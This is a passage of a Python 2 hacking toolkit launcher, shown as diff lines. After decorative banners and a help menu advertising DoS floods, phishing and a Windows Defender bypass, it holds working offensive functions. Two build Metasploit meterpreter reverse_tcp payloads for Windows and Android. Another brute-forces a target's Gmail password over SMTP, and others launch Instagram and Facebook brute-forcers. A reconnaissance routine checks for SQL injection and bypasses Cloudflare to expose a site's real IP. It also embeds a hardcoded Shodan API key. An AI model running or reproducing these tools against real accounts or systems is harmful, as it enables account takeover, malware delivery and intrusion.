_ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,14) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - 